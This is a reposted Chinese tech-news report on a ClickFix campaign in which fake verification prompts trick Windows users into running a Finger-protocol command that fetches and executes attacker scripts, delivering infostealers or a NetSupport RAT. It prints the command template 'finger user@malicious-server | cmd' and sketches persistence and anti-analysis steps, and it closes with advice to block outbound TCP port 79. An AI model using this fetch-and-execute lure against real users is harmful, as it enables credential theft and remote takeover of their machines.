当前位置: 首页
科技数码
黑客滥用古董Windows命令,40年后仍可远程毒控你的电脑

黑客滥用古董Windows命令,40年后仍可远程毒控你的电脑

热心网友 时间:2025-11-17
转载

11月16日消息,科技媒体bleepingcomputer昨日(11月15日)发布报告指出,近期有黑客组织利用诞生约40年的“Finger”协议,将其作为新型ClickFix恶意软件攻击链条中的关键环节。

注:Finger协议是一种非常早期的互联网协议,诞生于上世纪70年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已被基本废弃,但其客户端程序(finger.exe)仍在部分操作系统(如Windows)中保留。

攻击者利用该协议,在新型的ClickFix恶意软件攻击中,向受感染的Windows设备远程下发并执行恶意指令。Finger协议最初用于在Unix/Linux系统上查询用户信息,后来也被集成到Windows系统中。

虽然如今已鲜少有人使用,但其作为系统原生工具的特性,使其成为一种理想的“原生二进制程序(LOLBIN)”,能有效规避部分安全软件的检测机制。

攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的“人机验证”提示,诱导用户按下Win+R快捷键并输入一行看似无害的命令。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

该命令格式通常为 finger [用户名]@[恶意服务器地址] | cmd。一旦用户执行,Windows系统内置的finger.exe程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。

通过管道符 |,该脚本的输出被直接传递给Windows命令处理器cmd.exe执行,从而完成恶意代码的远程投递。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成PDF文件的ZIP压缩包。解压后,其中的恶意载荷便会被激活。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的NetSupport Manager远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。

为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

研究人员发现,这种攻击手法还在不断演变。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。

约40年前的Windows古董命令被滥用,黑客远程投毒可掌控你的PC

这些工具包括Process Monitor、Wireshark、Fiddler、OllyDbg等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。

由于此类攻击依赖于Finger协议进行通信,而该协议使用专门的TCP 79端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到TCP 79端口的流量。

来源:https://www.ithome.com/0/897/757.htm

游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。

同类文章
更多
2026年粤港澳车展小米汽车全系产品将首次亮相

2026年粤港澳车展小米汽车全系产品将首次亮相

小米汽车将携全系产品亮相2026年粤港澳大湾区车展,首次公开展示YU7标准版与GT版。车展于5月29日至6月7日在深圳国际会展中心举行,以科技、未来和市场为主题,规模达30万平方米,汇聚超百品牌、逾千款车型,呈现汽车科技前沿动态。

时间:2026-05-23 15:13
嫦娥七号下半年发射 中国月球探测后续任务规划详解

嫦娥七号下半年发射 中国月球探测后续任务规划详解

嫦娥七号计划于今年下半年择机发射,标志着我国月球探测工程持续推进。后续任务将深化对月球环境、资源及地质结构的科学认知,为未来月球科研站建设奠定基础。

时间:2026-05-23 15:12
神舟二十三号航天员名单公布今日正式出征

神舟二十三号航天员名单公布今日正式出征

神舟二十三号载人飞船将于5月24日发射,乘组由朱杨柱、张志远和黎家盈组成。朱杨柱任指令长,张志远和黎家盈为首次飞行,黎家盈是中国首位港澳女性载荷专家。乘组由第三、四批航天员共同构成,将开展为期一年的在轨驻留试验,并与空间站对接形成新组合体。目前各项准备工作就绪。

时间:2026-05-23 15:12
航天员朱杨柱父亲支持儿子重返太空 朱耿德谈训练日常

航天员朱杨柱父亲支持儿子重返太空 朱耿德谈训练日常

神舟二十三号载人飞船将于5月24日发射,由朱杨柱、张志远、黎家盈组成乘组,朱杨柱担任指令长。他曾执行神舟十六号任务,此次再度出征。其父朱耿德表示,相比上次,如今心情更为平静。他透露儿子一直为重返太空坚持训练,自己对此全力支持。

时间:2026-05-23 15:12
泰州跨境电商产业带发展论坛 助力企业出海实战指南

泰州跨境电商产业带发展论坛 助力企业出海实战指南

泰州举办“跨境电商+产业带”对接活动,聚焦汽摩配产业出海。活动促成约350万美元跨境采购意向,主要面向南亚市场,并启动本土跨境电商服务生态联盟,整合物流、运营等全链条服务。通过AI赋能与平台解读,提升企业数字化营销能力。政府将持续推动“跨境电商+产业带”融合,助力传统制造数字化转型。

时间:2026-05-23 15:12
热门专题
更多
刀塔传奇破解版无限钻石下载大全 刀塔传奇破解版无限钻石下载大全
洛克王国正式正版手游下载安装大全 洛克王国正式正版手游下载安装大全
思美人手游下载专区 思美人手游下载专区
好玩的阿拉德之怒游戏下载合集 好玩的阿拉德之怒游戏下载合集
不思议迷宫手游下载合集 不思议迷宫手游下载合集
百宝袋汉化组游戏最新合集 百宝袋汉化组游戏最新合集
jsk游戏合集30款游戏大全 jsk游戏合集30款游戏大全
宾果消消消原版下载大全 宾果消消消原版下载大全
  • 日榜
  • 周榜
  • 月榜
热门教程
更多
  • 游戏攻略
  • 安卓教程
  • 苹果教程
  • 电脑教程